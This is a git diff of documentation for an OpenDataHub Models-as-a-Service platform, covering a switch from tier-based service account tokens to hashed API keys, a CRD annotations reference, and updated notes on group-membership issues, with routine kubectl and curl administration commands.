+2. Gateway routes to MaaSAuthPolicy (Authorino).
+3. MaaSAuthPolicy validates the key via MaaS API and selects subscription; on failure returns 401/403.
+4. MaaSSubscription (Limitador) checks token rate limits; on exceed returns 429.
+5. Request reaches Inference Service and LLM; completion returned to user.
+
+```mermaid
+graph TB
+    subgraph UserLayer["User"]
+        U[User]
     end
     
-    subgraph "premium namespace"
-        PremiumSA1[**ServiceAccount**<br/>prem-user1-sa]
+    subgraph GatewayLayer["Gateway & Policy"]
+        G[Gateway]
+        MAP[MaaSAuthPolicy<br/>Authorino]
+        MS[MaaSSubscription<br/>Limitador]
     end
     
-    subgraph "enterprise namespace"
-        EnterpriseSA1[**ServiceAccount**<br/>ent-user1-sa]
+    subgraph MaaSLayer["Token Management"]
+        API[MaaS API]
     end
     
-    User -->|"Request with<br/>OpenShift Token"| Gateway
-    AdminUI -->|"Request with<br/>OpenShift Token"| Gateway
-    Gateway -->|"/maas-api path"| AuthPolicy
-    AuthPolicy -->|"Authenticated Request"| API
+    subgraph ModelLayer["Model Serving"]
+        INV[Inference Service]
+        LLM[LLM]
+    end
     
-    API --> TierMapping
-    API --> TokenGen
+    U -->|"1. Inference + API key"| G
+    G -->|"2. Route"| MAP
+    MAP -.->|"3. Validate key"| API
+    MAP -->|"4. Auth OK"| MS
+    MS -->|"5. Within limits"| INV
+    INV -->|"6. Forward"| LLM
+    LLM -->|"7. Completion"| U
     
-    TierMapping --> ConfigMap
-    ConfigMap -->|Maps Groups to Tiers| K8sGroups
-    TokenGen --> FreeSA1
-    TokenGen --> FreeSA2
-    TokenGen --> PremiumSA1
-    TokenGen --> EnterpriseSA1
+    MAP -.->|"401/403"| U
+    MS -.->|"429"| U
     
-    K8sGroups -->|Group Membership| TierMapping
+    linkStyle 7 stroke:#c62828,stroke-width:2px,stroke-dasharray:5,5
+    linkStyle 8 stroke:#c62828,stroke-width:2px,stroke-dasharray:5,5
     
     style API fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff
-    style ConfigMap fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff
-    style K8sGroups fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff
-    style FreeSA1 fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
-    style FreeSA2 fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
-    style PremiumSA1 fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
-    style EnterpriseSA1 fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
+    style G fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff
+    style MAP fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
+    style MS fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
+    style INV fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
+    style LLM fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
 ```
 
-**Key Features:**
+### Auth & Validation Flow (Deep Dive)
 
-- **Tier-to-Group Mapping**: Uses ConfigMap in the same namespace as MaaS API to map Kubernetes groups to tiers
-- **Configurable Tiers**: Out of the box, the MaaS Platform comes with three default tiers: free, premium, and enterprise. These tiers are configurable and can be extended to support more tiers as needed.
-- **Service Account Tokens**: Generates tokens for the appropriate tier's service account based on user's group membership
-- **Future Enhancements**: Planned improvements for more sophisticated token management and the ability to integrate with external identity providers.
+The MaaSAuthPolicy delegates to the MaaS API for key validation and subscription selection. The subscription name comes from the PostgreSQL key record (set at key creation).
 
-#### Inference Service Component Details
+**Flow summary:**
 
-Once a user has obtained their token through the MaaS API, they can use it to make inference requests to the Gateway API. RHCL's Application Connectivity Policies then validate the token and enforce access control and rate limiting policies:
+1. Authorino calls MaaS API to validate the API key.
+2. MaaS API validates the key (format, not revoked, not expired) and returns username, groups, and subscription.
+3. Authorino calls MaaS API to check subscription (groups, username, requested subscription from the key).
+4. If the user lacks access to the requested subscription → error (403).
+5. On success, returns selected subscription; Authorino caches the result (e.g., 60s TTL). AuthPolicy may inject `X-MaaS-Subscription` **server-side** for downstream rate limiting and metrics. Clients do not send this header on inference; subscription comes from the API key record created at mint time.
 
 ```mermaid
 graph TB
-    subgraph "Client Layer"
-        Client[Client Applications<br/>with Service Account Token]
+    subgraph AuthLayer["MaaSAuthPolicy (Authorino)"]
+        A[Authorino]
     end
     
-    subgraph "Gateway Layer"
-        GatewayAPI[**maas-default-gateway**<br/>maas.CLUSTER_DOMAIN]
-        Envoy[**Envoy Proxy**]
+    subgraph MaaSLayer["MaaS API"]
+        Validate[Validate API Key]
+        SubSelect[Check Subscription]
     end
     
-    subgraph "RHCL Policy Engine"
-        Kuadrant[**Kuadrant**<br/>Policy Attachment]
-        Authorino[**Authorino**<br/>Authentication Service]
-        Limitador[**Limitador**<br/>Rate Limiting Service]
+    subgraph Storage["Storage"]
+        DB[(PostgreSQL)]
     end
     
-    subgraph "Policy Components"
-        AuthPolicy[**AuthPolicy**<br/>gateway-auth-policy]
-        RateLimitPolicy[**RateLimitPolicy**<br/>gateway-rate-limits]
-        TokenRateLimitPolicy[**TokenRateLimitPolicy**<br/>gateway-level]
+    A -->|"1. Validate key"| Validate
+    Validate -->|"Lookup hash, check not expired"| DB
+    DB -->|"metadata"| Validate
+    
+    A -->|"2. Check subscription"| SubSelect
+    SubSelect -.->|"3. No access to requested sub → 403"| A
+    SubSelect -->|"4. Selected subscription"| A
+    
+    linkStyle 4 stroke:#c62828,stroke-width:2px,stroke-dasharray:5,5
+    
+    style Validate fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff
+    style SubSelect fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff
+    style DB fill:#336791,stroke:#333,stroke-width:2px,color:#fff
+```
+
+### Observability Flow
+
+Token usage and rate-limit data flow from Limitador into Prometheus and onward to dashboards.
+
+**Flow summary:**
+
+1. Limitador stores token usage counters (e.g., `authorized_hits`, `authorized_calls`, `limited_calls`) with labels (`user`, `model`).
+2. A ServiceMonitor (or Kuadrant PodMonitor) configures Prometheus to scrape Limitador's `/metrics` endpoint.
+3. Prometheus stores the metrics in its time-series database.
+4. Grafana (or other visualization tools) queries Prometheus to build dashboards for usage, billing, and operational health.
+
+```mermaid
+graph LR
+    subgraph RateLimiting["Rate Limiting"]
+        Limitador[Limitador<br/>Token usage counters<br/>authorized_hits, authorized_calls, limited_calls]
     end
     
-    subgraph "Model Access Control"
-        RBAC[**Kubernetes RBAC**<br/>Service Account Permissions]
-        LLMInferenceService[**LLMInferenceService**<br/>Model Access Control]
+    subgraph Scraping["Metric Scraping"]
+        SM[ServiceMonitor<br/>or PodMonitor]
     end
     
-    subgraph "Model Serving"
-        RHOAI[**RHOAI Platform**]
-        Models[**LLM Models**<br/>Qwen, Granite, Llama]
+    subgraph Storage["Metrics Storage"]
+        Prometheus[(Prometheus)]
     end
     
-    subgraph "Observability"
-        Prometheus[**Prometheus**<br/>Metrics Collection]
+    subgraph Visualization["Visualization"]
+        Grafana[Grafana<br/>Dashboards]
     end
     
-    Client -->|Inference Request + Service Account Token| GatewayAPI
-    GatewayAPI --> Envoy
-    
-    Envoy --> Kuadrant
-    Kuadrant --> Authorino
-    Kuadrant --> Limitador
-    
-    Authorino --> AuthPolicy
-    Limitador --> RateLimitPolicy
-    Limitador --> TokenRateLimitPolicy
-    
-    Envoy -->|Check Model Access| RBAC
-    RBAC --> LLMInferenceService
-    LLMInferenceService -->|POST Permission Check| RHOAI
-    RHOAI --> Models
-    
-    Limitador -->|Usage Metrics| Prometheus
-    
-    style GatewayAPI fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff
-    style Kuadrant fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff
-    style Authorino fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff
-    style Limitador fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff
-    style AuthPolicy fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff
-    style RateLimitPolicy fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff
-    style TokenRateLimitPolicy fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff
-    style RBAC fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff
-    style LLMInferenceService fill:#d32f2f,stroke:#333,stroke-width:2px,color:#fff
-    style RHOAI fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
-    style Models fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
+    Limitador -->|"/metrics"| SM
+    SM -->|"Scrape"| Prometheus
+    Prometheus -->|"Query"| Grafana
+    
+    style Limitador fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
     style Prometheus fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff
+    style Grafana fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
 ```
 
-**Policy Engine Flow:**
-
-1. **User Request**: A user makes an inference request to the Gateway API with a valid token.
-2. **Service Account Authentication**: Authorino validates service account tokens using gateway-auth-policy
-3. **Rate Limiting**: Limitador enforces usage quotas per tier/user using gateway and per-route policies
-4. **Model Access Control**: RBAC checks if service account has POST access to the specific LLMInferenceService
-5. **Request Forwarding**: Only requests with proper model access are forwarded to RHOAI
-6. **Metrics Collection**: Limitador sends usage data to Prometheus for observability dashboards
-
 ## 🔄 Component Flows
 
-### 1. Token Retrieval Flow (MaaS API)
+### 1. API Key Creation Flow (MaaS API)
 
-The MaaS API generates service account tokens based on user group membership and tier configuration:
+Users create API keys by authenticating with their OpenShift token. The MaaS API generates a key, stores only the hash in PostgreSQL, and returns the plaintext once:
 
 ```mermaid
 sequenceDiagram
@@ -235,61 +296,51 @@ sequenceDiagram
     participant Gateway as Gateway API
     participant Authorino
     participant MaaS as MaaS API
-    participant TierMapper as Tier Mapper
-    participant K8s as Kubernetes API
+    participant DB as PostgreSQL
 
-    User->>Gateway: POST /maas-api/v1/tokens<br/>Authorization: Bearer {openshift-token}
+    User->>Gateway: POST /maas-api/v1/api-keys<br/>Authorization: Bearer {openshift-token}
     Gateway->>Authorino: Enforce MaaS API AuthPolicy
-    Authorino->>K8s: TokenReview (validate OpenShift token)
-    K8s-->>Authorino: User identity (username, groups)
+    Authorino->>Authorino: TokenReview (validate OpenShift token)
     Authorino->>Gateway: Authenticated
     Gateway->>MaaS: Forward request with user context
 
-    Note over MaaS,TierMapper: Determine User Tier
-    MaaS->>TierMapper: GetTierForGroups(user.groups)
-    TierMapper->>K8s: Get ConfigMap(tier-to-group-mapping)
-    K8s-->>TierMapper: Tier configuration
-    TierMapper-->>MaaS: User tier (e.g., "premium")
-
-    Note over MaaS,K8s: Ensure Tier Resources
-    MaaS->>K8s: Create Namespace({instance}-tier-{tier}) if needed
-    MaaS->>K8s: Create ServiceAccount({username-hash}) if needed
-
-    Note over MaaS,K8s: Generate Token
-    MaaS->>K8s: CreateToken(namespace, SA name, TTL)
-    K8s-->>MaaS: TokenRequest with token and expiration
+    Note over MaaS,DB: Create API Key
+    MaaS->>MaaS: Generate sk-oai-* key, hash with SHA-256
+    MaaS->>MaaS: Resolve subscription (explicit or highest priority)
+    MaaS->>DB: Store hash + metadata (user, groups, subscription, name)
+    DB-->>MaaS: Stored
 
-    MaaS-->>User: {<br/>  "token": "...",<br/>  "expiration": "4h",<br/>  "expiresAt": 1234567890<br/>}
+    MaaS-->>User: { "key": "sk-oai-...", "id": "...", ... }<br/>Plaintext shown ONLY ONCE
 ```
 
-### 3. Model Inference Flow
+### 2. Model Inference Flow
 
-The inference flow routes validated requests to RHOAI models:
-
-The Gateway API and RHCL components validate service account tokens and enforce policies:
+Inference requests use the API key. Authorino validates it via HTTP callback (with caching); Limitador enforces subscription-based token limits:
 
 ```mermaid
 sequenceDiagram
     participant Client
     participant GatewayAPI
-    participant Kuadrant
     participant Authorino
+    participant MaaS as MaaS API
     participant Limitador
-    participant AuthPolicy
-    participant RateLimitPolicy
     participant LLMInferenceService
     
-    Client->>GatewayAPI: Inference Request + Service Account Token
-    GatewayAPI->>Kuadrant: Applying Policies
-    Kuadrant->>Authorino: Validate Service Account Token
-    Authorino->>AuthPolicy: Check Token Validity
-    AuthPolicy-->>Authorino: Token Valid + Tier Info
-    Authorino-->>Kuadrant: Authentication Success
-    Kuadrant->>Limitador: Check Rate Limits
-    Limitador->>RateLimitPolicy: Apply Tier-based Limits
-    RateLimitPolicy-->>Limitador: Rate Limit Status
-    Limitador-->>Kuadrant: Rate Check Result
-    Kuadrant-->>GatewayAPI: Policy Decision (Allow/Deny)
-    GatewayAPI ->> LLMInferenceService: Forward Request
+    Client->>GatewayAPI: Inference + API Key
+    GatewayAPI->>Authorino: Validate credentials
+    
+    alt API key (sk-oai-*)
+        Authorino->>MaaS: POST /internal/v1/api-keys/validate
+        MaaS->>MaaS: Lookup hash in PostgreSQL
+        MaaS-->>Authorino: { valid, userId, groups, subscription }
+    end
+    
+    Authorino->>MaaS: POST /internal/v1/subscriptions/select (subscription check)
+    MaaS-->>Authorino: Selected subscription
+    
+    Authorino->>GatewayAPI: Auth success (cached)
+    GatewayAPI->>Limitador: Check TokenRateLimitPolicy
+    Limitador-->>GatewayAPI: Within limits
+    GatewayAPI->>LLMInferenceService: Forward request
     LLMInferenceService-->>Client: Response
 ```
diff --git a/docs/content/configuration-and-management/crd-annotations.md b/docs/content/configuration-and-management/crd-annotations.md
new file mode 100644
index 000000000..a3c23a05e
--- /dev/null
+++ b/docs/content/configuration-and-management/crd-annotations.md
@@ -0,0 +1,84 @@
+# CRD Annotations Reference
+
+This page documents the standard annotations supported on MaaS custom resources.
+
+## Common annotations (all CRDs)
+
+These annotations are supported on **MaaSModelRef**, **MaaSAuthPolicy**, and **MaaSSubscription**. They follow OpenShift conventions and are recognized by the OpenShift console, `kubectl`, and other tooling.
+
+| Annotation | Description | Example |
+| ---------- | ----------- | ------- |
+| `openshift.io/display-name` | Human-readable display name | `"Llama 2 7B Chat"` |
+| `openshift.io/description` | Free-text description of the resource | `"A general-purpose LLM for chat"` |
+
+## MaaSModelRef annotations
+
+In addition to the common annotations above, the MaaS API reads these annotations from **MaaSModelRef** and returns them in the `modelDetails` field of the `GET /v1/models` response.
+
+| Annotation | Description | Returned in API | Example |
+| ---------- | ----------- | --------------- | ------- |
+| `openshift.io/display-name` | Human-readable model name | `modelDetails.displayName` | `"Llama 2 7B Chat"` |
+| `openshift.io/description` | Model description | `modelDetails.description` | `"A large language model optimized for chat"` |
+| `opendatahub.io/genai-use-case` | GenAI use case category | `modelDetails.genaiUseCase` | `"chat"` |
+| `opendatahub.io/context-window` | Context window size | `modelDetails.contextWindow` | `"4096"` |
+
+### Example MaaSModelRef with annotations
+
+```yaml
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: llama-2-7b-chat
+  namespace: opendatahub
+  annotations:
+    openshift.io/display-name: "Llama 2 7B Chat"
+    openshift.io/description: "A large language model optimized for chat use cases"
+    opendatahub.io/genai-use-case: "chat"
+    opendatahub.io/context-window: "4096"
+spec:
+  modelRef:
+    kind: LLMInferenceService
+    name: llama-2-7b-chat
+```
+
+### API response
+
+When annotations are set, the `GET /v1/models` response includes a `modelDetails` object:
+
+```json
+{
+  "id": "llama-2-7b-chat",
+  "object": "model",
+  "created": 1672531200,
+  "owned_by": "opendatahub",
+  "ready": true,
+  "url": "https://...",
+  "modelDetails": {
+    "displayName": "Llama 2 7B Chat",
+    "description": "A large language model optimized for chat use cases",
+    "genaiUseCase": "chat",
+    "contextWindow": "4096"
+  }
+}
+```
+
+When no annotations are set (or all values are empty), `modelDetails` is omitted from the response.
+
+## MaaSAuthPolicy and MaaSSubscription annotations
+
+The common annotations (`openshift.io/display-name`, `openshift.io/description`) can be set on MaaSAuthPolicy and MaaSSubscription resources for use by `kubectl`, the OpenShift console, and other tooling. They are **not** returned in the `GET /v1/models` API response.
+
+### Example
+
+```yaml
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSAuthPolicy
+metadata:
+  name: premium-access
+  namespace: models-as-a-service
+  annotations:
+    openshift.io/display-name: "Premium Access Policy"
+    openshift.io/description: "Grants premium-users group access to premium models"
+spec:
+  # ...
+```
diff --git a/docs/content/configuration-and-management/group-membership-known-issues.md b/docs/content/configuration-and-management/group-membership-known-issues.md
index 4df6091c0..2b90652b1 100644
--- a/docs/content/configuration-and-management/group-membership-known-issues.md
+++ b/docs/content/configuration-and-management/group-membership-known-issues.md
@@ -10,10 +10,10 @@ When a user is removed from a group (e.g., removed from `premium-users` group) w
 
 ### How Group Membership Affects Access
 
-1. **Token Request**: When a user requests a MaaS token, their group memberships are evaluated to determine their tier.
-2. **Service Account Creation**: A Service Account is created in the tier-specific namespace (e.g., `maas-default-gateway-tier-premium`).
+1. **Token Request**: When a user requests a MaaS token, their group memberships are evaluated to determine their subscription(s).
+2. **Service Account Creation**: A Service Account is created in the subscription-specific namespace (e.g., `maas-default-gateway-tier-premium` for the premium subscription).
 3. **Token Issuance**: The token is issued for the Service Account, not the original user.
-4. **Request Authorization**: Requests are authorized based on the Service Account's identity and the tier metadata cached in the AuthPolicy.
+4. **Request Authorization**: Requests are authorized based on the Service Account's identity and the subscription metadata cached in the AuthPolicy.
 
 ### Side Effects
 
@@ -26,19 +26,19 @@ When a user is removed from a group (e.g., removed from `premium-users` group) w
 When a user is removed from a group, their existing MaaS tokens remain valid until expiration because:
 
 - The token is a Kubernetes Service Account token, not a user token.
-- The Service Account continues to exist in the tier namespace.
+- The Service Account continues to exist in the subscription namespace.
 - Kubernetes TokenReview validates the Service Account, not the original user's group membership.
 
 **Example Scenario**:
 
 ```text
 T+0h:   User "alice" is in "premium-users" group
-T+0h:   Alice requests a token -> Gets SA token in maas-default-gateway-tier-premium namespace
+T+0h:   Alice requests a token -> Gets SA token in premium subscription namespace
 T+1h:   Admin removes Alice from "premium-users" group
 T+1h:   Alice's token is STILL VALID (expires at T+24h)
 T+1h:   Alice can still make requests using the existing token
 T+24h:  Token expires, Alice must request a new one
-T+24h:  New token request -> Alice gets "free" tier (or fails if no tier matches)
+T+24h:  New token request -> Alice gets "free" subscription (or fails if no subscription matches)
 ```
 
 **Workaround**:
@@ -53,25 +53,25 @@ curl -X DELETE "${HOST}/maas-api/v1/tokens" \
 
 Note: The user must authenticate with their own token to revoke their tokens. Administrators cannot revoke tokens on behalf of other users in the current implementation.
 
-#### 2. Rate Limiting Continues at Old Tier
+#### 2. Rate Limiting Continues at Old Subscription
 
 **Impact**: Medium
 
 **Description**:
 
-The AuthPolicy caches the tier lookup result (default TTL: 5 minutes). After a user is removed from a group:
+The AuthPolicy caches the subscription lookup result (default TTL: 5 minutes). After a user is removed from a group:
 
-- Requests within the cache window continue to use the old tier's rate limits.
-- After cache expiry, the tier is re-evaluated based on current group membership.
-- If the user still has a valid token but no longer belongs to any tier group, requests may fail.
+- Requests within the cache window continue to use the old subscription's rate limits.
+- After cache expiry, the subscription is re-evaluated based on current group membership.
+- If the user still has a valid token but no longer belongs to any subscription group, requests may fail.
 
 **Example Timeline**:
 
 ```text
 T+0m:   User removed from "premium-users" group
-T+1m:   Request made -> Cached tier "premium" used -> Rate limit: 1000 tokens/min
+T+1m:   Request made -> Cached subscription "premium" used -> Rate limit: 1000 tokens/min
 T+5m:   Cache expires
-T+6m:   Request made -> Tier lookup fails (no matching group) -> Request may fail with 403
+T+6m:   Request made -> Subscription lookup fails (no matching group) -> Request may fail with 403
 ```
 
 **Workaround**:
@@ -85,10 +85,10 @@ T+6m:   Request made -> Tier lookup fails (no matching group) -> Request may fai
 
 **Description**:
 
-When a user is removed from a group, their Service Account in the tier namespace is not automatically deleted:
+When a user is removed from a group, their Service Account in the subscription namespace is not automatically deleted:
 
-- The Service Account remains in the tier namespace.
-- No new tokens can be issued for the old tier (tier lookup fails).
+- The Service Account remains in the subscription namespace.
+- No new tokens can be issued for the old subscription (subscription lookup fails).
 - Old tokens continue to work until expiration.
 - This is a cleanup artifact, not a security issue (access is controlled by RBAC and rate limiting).
 
@@ -99,14 +99,14 @@ When a user is removed from a group, their Service Account in the tier namespace
 - To find the Service Account for a specific user, list and filter by the username pattern:
 
 ```bash
-# List all Service Accounts in the tier namespace
-kubectl get serviceaccount -n maas-default-gateway-tier-<old-tier>
+# List all Service Accounts in the subscription namespace
+kubectl get serviceaccount -n maas-default-gateway-tier-<old-subscription>
 
 # Filter by username pattern (e.g., for user "alice@example.com")
-kubectl get serviceaccount -n maas-default-gateway-tier-<old-tier> | grep alice
+kubectl get serviceaccount -n maas-default-gateway-tier-<old-subscription> | grep alice
 
 # Delete the identified Service Account
-kubectl delete serviceaccount <sa-name> -n maas-default-gateway-tier-<old-tier>
+kubectl delete serviceaccount <sa-name> -n maas-default-gateway-tier-<old-subscription>
 ```
 
 #### 4. User Downgrade Creates New Service Account
@@ -115,27 +115,27 @@ kubectl delete serviceaccount <sa-name> -n maas-default-gateway-tier-<old-tier>
 
 **Description**:
 
-When a user is moved to a lower tier (e.g., removed from `premium-users`, now only matching the `free` tier group, such as `system:authenticated` in the default configuration):
+When a user is moved to a lower subscription (e.g., removed from `premium-users`, now only matching the `free` subscription group, such as `system:authenticated` in the default configuration):
 
-- A new Service Account is created in the new tier namespace (e.g., `maas-default-gateway-tier-free`).
-- The old Service Account in the premium tier namespace remains.
+- A new Service Account is created in the new subscription namespace (e.g., `maas-default-gateway-tier-free`).
+- The old Service Account in the premium subscription namespace remains.
 - Old premium tokens continue to work until expiration.
-- New token requests create tokens in the free tier namespace.
+- New token requests create tokens in the free subscription namespace.
 
 **Example**:
 
 ```text
-Before: Alice in "premium-users" -> SA in maas-default-gateway-tier-premium
-After:  Alice removed from "premium-users" (still matches "free" tier group)
+Before: Alice in "premium-users" -> SA in premium subscription namespace
+After:  Alice removed from "premium-users" (still matches "free" subscription group)
         -> Old SA still exists in premium namespace
-        -> New token request creates SA in maas-default-gateway-tier-free
+        -> New token request creates SA in free subscription namespace
         -> Alice now has SAs in both namespaces
 ```
 
 **Workaround**:
 
 - Revoke tokens before changing group membership to ensure clean transition.
-- Delete the user's Service Account manually from the old tier namespace when they change groups.
+- Delete the user's Service Account manually from the old subscription namespace when they change groups.
 
 #### 5. Monitoring Shows Split Metrics
 
@@ -143,16 +143,16 @@ After:  Alice removed from "premium-users" (still matches "free" tier group)
 
 **Description**:
 
-If a user has tokens from multiple tiers (before and after group change):
+If a user has tokens from multiple subscriptions (before and after group change):
 
 - Metrics are attributed to the Service Account's namespace.
-- Usage appears split across tier namespaces.
+- Usage appears split across subscription namespaces.
 - This is a reporting artifact and does not affect access control.
 
 **Workaround**:
 
 - Aggregate metrics by username label if available.
-- Encourage users to revoke old tokens after tier changes.
+- Encourage users to revoke old tokens after subscription changes.
 
 ### Recommended Practices
 
@@ -162,9 +162,9 @@ If a user has tokens from multiple tiers (before and after group change):
 
 3. **Use Short Token Expiration**: Shorter token lifetimes reduce the window of continued access after group removal.
 
-4. **Clean Up Service Accounts**: When a user changes groups, manually delete their Service Account from the old tier namespace to prevent orphaned resources.
+4. **Clean Up Service Accounts**: When a user changes groups, manually delete their Service Account from the old subscription namespace to prevent orphaned resources.
 
 ### Related Documentation
 
-- [Tier Configuration](./tier-configuration.md) - How to configure tier-to-group mappings
+- [Quota and Access Configuration](./quota-and-access-configuration.md) - How to configure subscription-to-group mappings
 - [Token Management](./token-management.md) - Understanding token lifecycle and revocation
diff --git a/docs/content/configuration-and-management/maas-controller-overview.md b/docs/content/configuration-and-management/maas-controller-overview.md
index 7796e460e..eeacbd73e 100644
--- a/docs/content/configuration-and-management/maas-controller-overview.md
+++ b/docs/content/configuration-and-management/maas-controller-overview.md
@@ -57,7 +57,7 @@ flowchart TB
 
 **Summary:** You declare intent with MaaS CRs; the controller turns that into Gateway/Kuadrant resources that attach to the same HTTPRoute and backend (e.g. KServe LLMInferenceService).
 
-The **MaaS API** GET /v1/models endpoint uses MaaSModelRef CRs as its primary source: it lists them in the API namespace, then **validates access** by probing each model’s `/v1/models` endpoint with the client’s **Authorization header** (passed through as-is). Only models that return 2xx or 405 are included. So the catalogue returned to the client is the set of MaaSModelRef objects the controller reconciles, filtered to those the client can actually access. No token exchange is performed; the header is forwarded as-is. (Once minting is in place, this may be revisited.)
+The **MaaS API** GET /v1/models endpoint uses MaaSModelRef CRs as its primary source: it reads them cluster-wide (all namespaces), then **validates access** by probing each model’s `/v1/models` endpoint with the client’s **Authorization header** (passed through as-is). Only models that return 2xx or 405 are included. So the catalogue returned to the client is the set of MaaSModelRef objects the controller reconciles, filtered to those the client can actually access. No token exchange is performed; the header is forwarded as-is.
 
 ---
 
@@ -213,21 +213,18 @@ flowchart LR
     Deploy --> Examples
 ```
 
-- **Namespace**: Controller and default MaaS CRs live in **opendatahub** (configurable).
+- **Namespaces**: MaaS API and controller default to **opendatahub** (configurable). MaaSAuthPolicy and MaaSSubscription default to **models-as-a-service** (configurable). MaaSModelRef must live in the **same namespace** as the model it references (e.g. **llm**).
 - **Install**: `./scripts/deploy.sh` installs the full stack including the controller. Optionally run `./scripts/install-examples.sh` for sample MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription.
 
 ---
 
 ## 9. Authentication (Current Behavior)
 
-For **GET /v1/models**, the API forwards the client’s **Authorization** header as-is to each model endpoint (no token exchange). For inference, until MaaS API token minting is in place, use the **OpenShift token**:
+For **GET /v1/models**, the maas-api forwards the client’s **Authorization** header as-is to each model endpoint (no token exchange). You can use an **OpenShift token** or an **API key** (`sk-oai-*`). With a user token, you may send `X-MaaS-Subscription` to filter when you have access to multiple subscriptions.
 
-```bash
-export TOKEN=$(oc whoami -t)
-curl -H "Authorization: Bearer $TOKEN" "https://<gateway-host>/llm/<model-name>/v1/chat/completions" -d '...'
-```
+For **model inference** (requests to `…/llm/<model>/v1/chat/completions` and similar), use an **API key** created via `POST /v1/api-keys` only. Each key is bound to one MaaSSubscription at mint time.
 
-The Kuadrant AuthPolicy validates this token via **Kubernetes TokenReview** and derives user/groups for authorization and for the identity passed to TokenRateLimitPolicy (including `groups_str`).
+The Kuadrant AuthPolicy validates API keys via the MaaS API and validates user tokens via `Kubernetes TokenReview`, deriving user/groups for authorization and for TokenRateLimitPolicy (including `groups_str`).
 
 ---
 
@@ -236,7 +233,7 @@ The Kuadrant AuthPolicy validates this token via **Kubernetes TokenReview** and
 | Topic | Summary |
 |-------|---------|
 | **What** | MaaS Controller = control plane that reconciles MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription into Gateway API and Kuadrant resources. |
-| **Where** | Single controller in `maas-controller`; CRs and generated resources can live in opendatahub or other namespaces. |
+| **Where** | Single controller in `opendatahub`; MaaSAuthPolicy / MaaSSubscription default to `models-as-a-service`; MaaSModelRef and generated Kuadrant policies target their model’s namespace. |
 | **How** | Three reconcilers watch MaaS CRs (and related resources); each creates/updates HTTPRoutes, AuthPolicies, or TokenRateLimitPolicies. |
 | **Identity bridge** | AuthPolicy exposes all user groups as a comma-separated `groups_str`; TokenRateLimitPolicy uses `groups_str.split(",").exists(...)` for subscription matching (the “string trick”). |
 | **Deploy** | Run `./scripts/deploy.sh`; optionally install examples. |
diff --git a/docs/content/configuration-and-management/maas-model-kinds.md b/docs/content/configuration-and-management/maas-model-kinds.md
index 96d1f43f2..4c576619a 100644
--- a/docs/content/configuration-and-management/maas-model-kinds.md
+++ b/docs/content/configuration-and-management/maas-model-kinds.md
@@ -1,4 +1,4 @@
-# MaaSModelRef kinds (future)
+# MaaSModelRef Kinds
 
 The MaaS API lists models from **MaaSModelRef** CRs only. Each MaaSModelRef defines a **backend reference** (`spec.modelRef`) that identifies the type and location of the model endpoint—similar in spirit to how [Gateway API's BackendRef](https://gateway-api.sigs.k8s.io/reference/spec/#backendref) defines how a Route forwards requests to a Kubernetes resource (group, kind, name, namespace).
 
@@ -12,13 +12,12 @@ MaaSModelRef's `spec.modelRef` identifies the **referent** (the backend that ser
 | ----------- | ----------- |
 | **kind**    | The type of backend. Determines which controller reconciles this MaaSModelRef and how the endpoint is resolved. Valid values: `LLMInferenceService`, `ExternalModel`. The alias `llmisvc` is also accepted for backwards compatibility. |
 | **name**    | Name of the referent resource (e.g. LLMInferenceService name, or external model identifier). |
-| **namespace** | *(Optional)* Namespace of the referent. If empty, the MaaSModelRef's namespace is used. |
 
-The controller that reconciles MaaSModelRef uses **kind** to decide how to resolve the backend and populate `status.endpoint` and `status.phase`. Cross-namespace references are supported by specifying `modelRef.namespace`.
+The controller that reconciles MaaSModelRef uses **kind** to decide how to resolve the backend and populate `status.endpoint` and `status.phase`. The referent must be in the same namespace as the MaaSModelRef.
 
 ## Endpoint override
 
-MaaSModel supports an optional `spec.endpointOverride` field. When set, the controller uses this value for `status.endpoint` instead of the auto-discovered endpoint from the backend (LLMInferenceService status, Gateway, or HTTPRoute hostnames).
+MaaSModelRef supports an optional `spec.endpointOverride` field. When set, the controller uses this value for `status.endpoint` instead of the auto-discovered endpoint from the backend (LLMInferenceService status, Gateway, or HTTPRoute hostnames).
 
 This is useful when:
 - The controller picks the wrong gateway or hostname for the model endpoint.
@@ -29,25 +28,44 @@ Example:
 
 ```yaml
 apiVersion: maas.opendatahub.io/v1alpha1
-kind: MaaSModel
+kind: MaaSModelRef
 metadata:
   name: my-model
-  namespace: opendatahub
+  namespace: llm
 spec:
   modelRef:
     kind: LLMInferenceService
     name: my-model
-    namespace: llm
   endpointOverride: "https://correct-hostname.example.com/my-model"
 ```
 
 The controller still validates the backend (HTTPRoute exists, LLMInferenceService is ready, etc.) — the override only affects the final endpoint URL written to `status.endpoint`. When the field is empty or omitted, the controller uses its normal discovery logic.
 
-## Current behavior
+## Supported Kinds
 
